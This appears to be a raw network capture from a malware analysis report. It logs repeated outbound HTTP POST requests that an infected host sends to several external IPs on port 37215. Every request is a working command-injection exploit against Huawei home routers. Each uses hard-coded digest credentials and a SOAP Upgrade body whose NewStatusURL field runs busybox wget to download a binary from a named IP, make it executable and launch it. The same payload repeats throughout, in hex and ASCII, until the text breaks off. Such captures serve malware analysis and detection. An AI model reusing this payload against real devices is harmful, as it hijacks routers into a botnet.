                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.362005949 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:09.033938885 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.377989054 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:13.193780899 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:18.569566011 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      136192.168.2.1448106102.187.155.10637215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:08.068295956 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      137192.168.2.143575041.238.50.11637215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:09.334217072 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      138192.168.2.1455668197.220.103.037215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:09.335388899 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:09.834187984 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.442023993 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:11.626019955 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 